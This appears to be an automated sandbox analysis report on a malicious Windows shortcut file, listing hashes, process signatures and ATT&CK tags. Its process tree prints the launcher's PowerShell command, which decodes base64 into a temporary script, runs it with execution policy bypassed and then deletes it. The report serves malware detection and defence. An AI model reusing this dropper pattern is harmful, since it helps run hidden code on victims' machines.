Analysis
- max time kernel: 121s
- max time network: 126s
- platform: windows7_x64
- resource: win7-20241010-en
- resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
- submitted: 13-11-2024 09:24
Static task: static1
Behavioral task: behavioral1
- Sample: c67871e6e9d3247002b6b15e1f4b1d3b99658f74636e53a8ce205030506ad463.lnk
- Resource: win7-20241010-en
Behavioral task: behavioral2
- Sample: c67871e6e9d3247002b6b15e1f4b1d3b99658f74636e53a8ce205030506ad463.lnk
- Resource: win10v2004-20241007-en
General
- Target: c67871e6e9d3247002b6b15e1f4b1d3b99658f74636e53a8ce205030506ad463.lnk
- Size: 2KB
- MD5: 62a2b911a0cbbbf5d5f5b3219e5104e4
- SHA1: 26eafa71722e807e1e13844456f201d12a75bd72
- SHA256: c67871e6e9d3247002b6b15e1f4b1d3b99658f74636e53a8ce205030506ad463
- SHA512: 060027a0f5a0ea24c1cc88dafad85dc2ab6f19fdc76a47f3cf168c4085c39538f1dde60049df00d23454f69a90b8ce07ccb0fbca599e793c901046f75f8da543
Malware Config
Signatures
- Processes:
    pid   Process
    2820  powershell.exe
    2736  powershell.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes:
    pid   Process
    2736  powershell.exe
    2820  powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes:
    description              pid   Process
    Token: SeDebugPrivilege  2736  powershell.exe
    Token: SeDebugPrivilege  2820  powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes:
    description                       pid   Process         procid_target
    PID 3040 wrote to memory of 2736  3040  cmd.exe         31
    PID 3040 wrote to memory of 2736  3040  cmd.exe         31
    PID 3040 wrote to memory of 2736  3040  cmd.exe         31
    PID 2736 wrote to memory of 2820  2736  powershell.exe  32
    PID 2736 wrote to memory of 2820  2736  powershell.exe  32
    PID 2736 wrote to memory of 2820  2736  powershell.exe  32
Processes
1. C:\Windows\system32\cmd.exe
   Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\c67871e6e9d3247002b6b15e1f4b1d3b99658f74636e53a8ce205030506ad463.lnk
   - Suspicious use of WriteProcessMemory
   PID: 3040
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "ARCHIVO 1512.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')) > "C:\Users\Admin\AppData\Local\Temp\vyrEzcdcTl.ps1"; powershell -executionpolicy bypass -file "$env:TEMP/\vyrEzcdcTl.ps1"; Remove-Item "$env:TEMP/\vyrEzcdcTl.
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 2736
      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\Admin\AppData\Local\Temp/\vyrEzcdcTl.ps1
         - Command and Scripting Interpreter: PowerShell
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         PID: 2820
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 946B
  MD5: b6c0d424fc2e8f0305869f276f3ab851
  SHA1: cc330652aade5fa66cf581884b1a347673206cd0
  SHA256: 70280b341855deaa98065c4548ba8cbbf318a99b288bafa4217c6b205519776c
  SHA512: 21a656692df485e9c678617c6c77c8ea9ab4cef4a214d56f7ff7c5df7b0c484eb4494fb60552746c178875e3ddc66547f2e2eb31d67be8c3745de862bbea4e8e